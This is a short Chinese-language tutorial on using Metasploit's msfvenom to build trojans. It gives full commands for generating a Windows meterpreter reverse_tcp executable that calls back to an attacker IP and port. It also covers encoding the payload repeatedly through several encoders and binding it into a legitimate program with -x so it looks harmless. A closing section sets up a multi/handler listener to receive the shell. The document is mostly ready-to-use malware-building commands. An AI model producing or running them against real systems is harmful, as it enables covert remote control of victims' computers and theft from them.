metasploit 之 msfvenom的使用
metasploit 之 msfvenom的使用
- msfvenom是msfpayload,msfencode的结合体,可以利用msfvenom生成木马程序,并在目标机上执行,在本地监听。
命令参数
- 查看支持的系统平台:msfvenom --list platforms
- 查看所有的payloads:msfvenom --list payloads
- 查看payload支持什么平台、哪些选项,使用:msfvenom -p payloads的名字 --list-options
- 查看编码方式:msfvenom --list encoder
木马制作
- 在终端执行以下命令:(普通生成)msfvenom -p [payloads] [payload options] -f [format] -o [path]
- -p 选择一个payload -f 生成的文件格式 -o(或者 > ) 输出路径
- 如:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.12(kali ip) lport=4444 -f -o test.exe
- 编码生成:
- msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件
- msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.8.12 lport=4444 -i 5 -e x86/shikata_ga_nai -b “\x00” -f exe -o payload.exe(使用x86/shikata_ga_nai方式对payload进行了5次编码,而且使用了-b参数去掉payload中的空字符)
- 捆绑:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.12 LPORT=4444 -x 文件名.exe -f exe -o payload.ex
- -x 指定捆绑到哪个程序
- 编码+捆绑:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.12 LPORT=4444 -e x86/shikata_ga_nai -x 文件名.exe -i 15 -f exe -o payload.exe
- 多重编码+捆绑:
- msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.8.12 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x 文件名.exe -f exe -o payload.exe
- 以上命令,使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码20次,接着 来10次的alpha_upper编码,再来10次的countdown编码,最后才生成以文件名.exe为模板的可执行文件
实战
1、制作木马
- 终端输入命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.8.12 lport=4444 -i 5 -e x86/shikata_ga_nai -f exe -o payload.exe
2、设置监听端口监听
- 1、终端输入:msfconsole -q(安静模式)
- 2、use exploit/multi/handler
- 3、show options(查看需要配置哪些信息)
- 4、set payload windows/meterpreter/reverse_tcp
- 5、set lhost 192.168.8.12
- 6、set lport 4444
- 7、run
![]()